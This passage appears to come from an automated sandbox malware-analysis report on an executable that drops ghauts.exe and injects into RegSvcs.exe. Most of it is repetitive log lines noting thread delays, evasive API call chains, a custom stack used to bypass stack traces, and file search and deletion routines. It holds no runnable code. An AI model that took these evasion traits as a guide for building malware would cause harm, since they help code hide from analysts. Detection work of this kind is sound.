                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeAPI/Special instruction interceptor: Address: 105885C
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeAPI/Special instruction interceptor: Address: 1B88004
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597322Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597072Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596482Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598072Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597952Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597815Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597600Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595936Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594840Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2101Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7720Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2557Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7288Jump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeAPI coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeAPI coverage: 4.9 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 5.3 %
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4445A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4C6D1 FindFirstFileW,FindClose,0_2_00F4C6D1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F4C75C
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4EF95
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4F0F2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4F3F3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F437EF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F43B12
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4BCBC
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_005F445A
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FC6D1 FindFirstFileW,FindClose,1_2_005FC6D1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005FC75C
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FEF95
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FF0F2
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FF3F3
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F37EF
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F3B12
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FBCBC
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EE49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597322Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597072Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596482Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
